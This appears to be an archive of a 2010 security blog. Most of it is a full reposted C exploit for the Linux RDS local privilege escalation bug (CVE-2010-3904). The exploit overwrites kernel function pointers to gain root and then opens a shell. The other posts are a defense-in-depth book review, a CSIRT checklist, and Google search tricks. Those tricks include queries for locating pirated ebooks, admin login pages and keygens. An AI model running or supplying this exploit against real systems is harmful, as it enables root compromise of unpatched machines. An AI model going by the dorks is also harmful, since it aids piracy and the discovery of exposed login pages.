Friday, October 22, 2010

Review for Network Security The Complete Reference

I've been looking for "Onion Methodology" for past few weeks. Network Security The Complete Reference has it.

"The Onion Model of Defense is a layered strategy, sometimes referred to as Defense in Depth. This model addresses the contingency of pa perimeter security breach occurring."

"Consider what happens when an invader picks the front door lock or breaks a window to gain entry to a house? The homeowner may hide cash in a drawer and may store valuable jewels in a safe. These protective mechanisms address the contingency that the perimeter security fails. They also address the prospect of an inside job. The same principles apply to network security. What happens when an attacker gets past the firewall? What happens when a trusted insider, like an employee or a contractor, abuse their privileges? The onion model addresses these contingencies."

Generally, the book is about a comprehensive resource that provide all the information necessary to formulate strategies to obtain and implement a network security program. A five star book.

Thursday, October 21, 2010

Linux RDS Protocol Local Privilege Escalation

/* 
 * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
 * CVE-2010-3904
 * by Dan Rosenberg 
 *
 * Copyright 2010 Virtual Security Research, LLC
 *
 * The handling functions for sending and receiving RDS messages
 * use unchecked __copy_*_user_inatomic functions without any
 * access checks on user-provided pointers.  As a result, by
 * passing a kernel address as an iovec base address in recvmsg-style
 * calls, a local user can overwrite arbitrary kernel memory, which
 * can easily be used to escalate privileges to root.  Alternatively,
 * an arbitrary kernel read can be performed via sendmsg calls.
 *
 * This exploit is simple - it resolves a few kernel symbols,
 * sets the security_ops to the default structure, then overwrites
 * a function pointer (ptrace_traceme) in that structure to point
 * to the payload.  After triggering the payload, the original
 * value is restored.  Hard-coding the offset of this function
 * pointer is a bit inelegant, but I wanted to keep it simple and
 * architecture-independent (i.e. no inline assembly).
 *
 * The vulnerability is yet another example of why you shouldn't
 * allow loading of random packet families unless you actually
 * need them.
 *
 * Greets to spender, kees, taviso, hawkes, team lollerskaters,
 * joberheide, bla, sts, and VSR
 *
 */


#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define RECVPORT 5555 
#define SENDPORT 6666

int prep_sock(int port)
{
 
 int s, ret;
 struct sockaddr_in addr;

 s = socket(PF_RDS, SOCK_SEQPACKET, 0);

 if(s < 0) {
  printf("[*] Could not open socket.\n");
  exit(-1);
 }
 
 memset(&addr, 0, sizeof(addr));

 addr.sin_addr.s_addr = inet_addr("127.0.0.1");
 addr.sin_family = AF_INET;
 addr.sin_port = htons(port);

 ret = bind(s, (struct sockaddr *)&addr, sizeof(addr));

 if(ret < 0) {
  printf("[*] Could not bind socket.\n");
  exit(-1);
 }

 return s;

}

void get_message(unsigned long address, int sock)
{

 recvfrom(sock, (void *)address, sizeof(void *), 0,
   NULL, NULL);

}

void send_message(unsigned long value, int sock)
{
 
 int size, ret;
 struct sockaddr_in recvaddr;
 struct msghdr msg;
 struct iovec iov;
 unsigned long buf;
 
 memset(&recvaddr, 0, sizeof(recvaddr));

 size = sizeof(recvaddr);

 recvaddr.sin_port = htons(RECVPORT);
 recvaddr.sin_family = AF_INET;
 recvaddr.sin_addr.s_addr = inet_addr("127.0.0.1");

 memset(&msg, 0, sizeof(msg));
 
 msg.msg_name = &recvaddr;
 msg.msg_namelen = sizeof(recvaddr);
 msg.msg_iovlen = 1;
 
 buf = value;

 iov.iov_len = sizeof(buf);
 iov.iov_base = &buf;

 msg.msg_iov = &iov;

 ret = sendmsg(sock, &msg, 0);
 if(ret < 0) {
  printf("[*] Something went wrong sending.\n");
  exit(-1);
 }
}

void write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)
{

 if(!fork()) {
   sleep(1);
   send_message(value, sendsock);
   exit(1);
 }
 else {
  get_message(addr, recvsock);
  wait(NULL);
 }

}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

 commit_creds(prepare_kernel_cred(0));
 return -1; 

}

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
 FILE *f;
 unsigned long addr;
 char dummy;
 char sname[512];
 struct utsname ver;
 int ret;
 int rep = 0;
 int oldstyle = 0;

 f = fopen("/proc/kallsyms", "r");
 if (f == NULL) {
  f = fopen("/proc/ksyms", "r");
  if (f == NULL)
   goto fallback;
  oldstyle = 1;
 }

repeat:
 ret = 0;
 while(ret != EOF) {
  if (!oldstyle)
   ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
  else {
   ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
   if (ret == 2) {
    char *p;
    if (strstr(sname, "_O/") || strstr(sname, "_S."))
     continue;
    p = strrchr(sname, '_');
    if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
     p = p - 4;
     while (p > (char *)sname && *(p - 1) == '_')
      p--;
     *p = '\0';
    }
   }
  }
  if (ret == 0) {
   fscanf(f, "%s\n", sname);
   continue;
  }
  if (!strcmp(name, sname)) {
   fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
   fclose(f);
   return addr;
  }
 }

 fclose(f);
 if (rep)
  return 0;
fallback:
 /* didn't find the symbol, let's retry with the System.map
    dedicated to the pointlessness of Russell Coker's SELinux
    test machine (why does he keep upgrading the kernel if
    "all necessary security can be provided by SE Linux"?)
 */
 uname(&ver);
 if (strncmp(ver.release, "2.6", 3))
  oldstyle = 1;
 sprintf(sname, "/boot/System.map-%s", ver.release);
 f = fopen(sname, "r");
 if (f == NULL)
  return 0;
 rep = 1;
 goto repeat;
}

int main(int argc, char * argv[])
{
 unsigned long sec_ops, def_ops, cap_ptrace, target;
 int sendsock, recvsock;
 struct utsname ver;

 printf("[*] Linux kernel >= 2.6.30 RDS socket exploit\n");
 printf("[*] by Dan Rosenberg\n");

 uname(&ver);

 if(strncmp(ver.release, "2.6.3", 5)) {
  printf("[*] Your kernel is not vulnerable.\n");
  return -1;
 } 

 /* Resolve addresses of relevant symbols */
 printf("[*] Resolving kernel addresses...\n");
 sec_ops = get_kernel_sym("security_ops");
 def_ops = get_kernel_sym("default_security_ops");
 cap_ptrace = get_kernel_sym("cap_ptrace_traceme");
 commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
 prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

 if(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {
  printf("[*] Failed to resolve kernel symbols.\n");
  return -1;
 }

 /* Calculate target */
 target = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));

 sendsock = prep_sock(SENDPORT);
 recvsock = prep_sock(RECVPORT);

 /* Reset security ops */
 printf("[*] Overwriting security ops...\n");
 write_to_mem(sec_ops, def_ops, sendsock, recvsock);

 /* Overwrite ptrace_traceme security op fptr */
 printf("[*] Overwriting function pointer...\n");
 write_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);

 /* Trigger the payload */
 printf("[*] Triggering payload...\n");
 ptrace(PTRACE_TRACEME, 1, NULL, NULL);
 
 /* Restore the ptrace_traceme security op */
 printf("[*] Restoring function pointer...\n");
 write_to_mem(target, cap_ptrace, sendsock, recvsock);

 if(getuid()) {
  printf("[*] Exploit failed to get root.\n");
  return -1;
 }

 printf("[*] Got root!\n");
 execl("/bin/sh", "sh", NULL);

}

Security Incident Response Team: CSIRT: Getting Start

Action List for Developing a Computer Security Incident Response Team (CSIRT)
  1. Identify stakeholders1 and participants.
  2. Obtain management support and sponsorship.
  3. Develop a CSIRT project plan.
  4. Gather information.
  5. Identify the CSIRT constituency.
  6. Define the CSIRT mission.
  7. Secure funding for CSIRT operations.
  8. Decide on the range and level of services the CSIRT will offer.
  9. Determine the CSIRT reporting structure, authority, and organizational model.
  10. Identify required resources such as staff, equipment, and infrastructure.
  11. Define interactions and interfaces.
  12. Define roles, responsibilities, and the corresponding authority.
  13. Document the workflow.
  14. Develop policies and corresponding procedures.
  15. Create an implementation plan and solicit feedback.
  16. Announce the CSIRT when it becomes operational.
  17. Define methods for evaluating the performance of the CSIRT.
  18. Have a backup plan for every element of the CSIRT.
  19. Be flexible.

Tuesday, October 5, 2010

Google Dork: eBook

Google: -inurl:htm -inurl:html intitle:”index of” +(“/ebooks”|”/book”) +(chm|pdf|zip)

What does all of this mean? The -inurl htm and -inul html is attempting to get rid of regular webpages and show just index pages. Looking for index of in the title is doing the same. Using the pipe ( | ) tells google to look for something OR something else. Here were are telling google to look for book or ebook directories… and we have listed several common ebook formats (zip, pdf, chf).

If you would like to look for a particular author or title just tack it to the end of your search.

Google: -inurl:htm -inurl:html intitle:”index of” +(“/ebooks”|”/book”) +(chm|pdf|zip) +”o’reilly”

This uses the same idea but attempts to focus on directories that contain O’Reilly stuff. It’s not perfect, but it’s better than paying.

Google Dork

Google Calc:

Google can also be used as a calculator, here are the few calculator operators that you can
use to perform arithmetic operations in Google.

+ , - , * , / , % of , ^

Goto www.google.com and in the input box, type in the calculation that you want to perform,
something like 8-5, Then you can get the appropriate result. Likewise you can use the rest of
the Calculator operators.

+ and - is not only meant for performing arithmetic operations, but you can use them to narrow down your search. Search for hacking + ebooks this will search for both hacking and ebooks, but gives more priority for ebooks rather that hacking.
Search for hacking – cracking so that you can restrict cracking related sites and info while searching for hacking.

Searching for Phrase ?
If you are searching for a phrase, then don’t forget to enclose it within quotes, it doesn’t matter, whatever the quote is, either single or double quote.
“igconito” or ‘igconito’

Wildcard search:
You can use asterisk operator for wildcard search in Google that find that possible matches either in one or more words that is enclosed in the quotes.
“adm*”

Some other Google Opertors:
Site:

This operator is used for search only one website alone for particular result. hacking info site:www.microsoft.com This query will narrow down your search and will find some hacking related information on the site www.microsoft.com.

Num range:
10….20
When this query is given as input to the google, then it will search for a number that ranges between 10 to 20.

Link:
link:www.microsoft.com
This query will display you, what ever the page that is linked with the site www.microsoft.com.

Related:
related:www.warez.com
What ever the websites that looks similar in contents or related to each other will be displayed as a result of this query.

Cache:
cache:www.ethicaluniversity.com
We can use this cache operator also as a proxy, because once we use this cache operator, Google will be acting as a proxy that stay in middle of the source and the destination.

Site:
site:www.ethicaluniversity.com
Site operator can be used to search whatever that is been indexed in a website.
now this will reveals a lot about this site that got indexed in its server.

allinanchor: Both the link and the allinanchor operator does the same thing, where allinanchor search for keywords that is enclosed in the anchor tag. allinanchor:login

Stocks:
stocks:icici
Using this stocks operator, you can get the current stock details.

Safesearch:
When SafeSearch is turned on, sites and web pages containing pornography and explicit sexual content are blocked from search results. Many Google users prefer not to have adult sites included in their search results. Google’s SafeSearch screens for sites that contain this type of information and eliminates them from search results. safesearch: keygens + cracks

Phonebook:
This operator will allow you to search phone numbers that Google consider them for quick reference.
phonebook: Disney CA

Info:
This operator cannot be used along with other Google operator.
This can be used for viewing information that Google knows about your site.
info:www.yahoo.com

Filetype:
You can narrow down your search using this filetype operator, if you are seacrhing for a file of specific type.
filetype:pdf “Networks”
This will fetch you some PDF documents or E-Books related to networking.

Google currently supports the following filetypes:
 txt, doc, pdf, ps, wk1, wk2, wk3, wk4, wk5, wki, wks, wku, lwp, mw, xls, ppt, wks, wps, wdb, wri, rtf, swf, ans, xml, cpp, java, torrent and so on.

Ext:
This is similar to the filetype operator. ext:pdf “Networks”

Define:
If you want to use Google like a Dictionary finding out for meaning or the definitions, you can use the define operator. define:hacking

allintext:
This is somewhat similar to the normal search that most of them do often, you can search for a specific term in google, and can use more number of words enclosed with quotes. allintext:defaced mirror

intitle:
This operator performs search by looking upon the text that is enclosed in the title tag. intitle:”admin login”

allintitle:
You can use only one argument while using the intitle operator, where as you can throw more than one in allintitle operator. intitle:”admin login” “webmaster login” “administrator”

Location:
You can search contents only from selected country websites by specifying the location using the location operator.
inurl:admin.asp location:india
This will fetch you pages that contain admin.asp in its URL and will be from India.

Source:
You can narrow down the search by restricting the source. you can specify the source as a popular E-zines, aricles and even publishers.
“Network Security” source:tata mcgraw hill
This will fetch you results for “Network Security” related topics that was published by tata McGraw Hill publications.

Weather:
weather:chennai This will return you the weather in chennai. likewise you can look for your city.

Conversions:
 you can convert to or from Degrees and Radians using Google.

Number Bases

in hex

in binary

in octal

in decimal

Speed, time and distance conversions

20mph in kph

2 month in minutes

420 kelvin in celsius

5 fahrenheit in celsius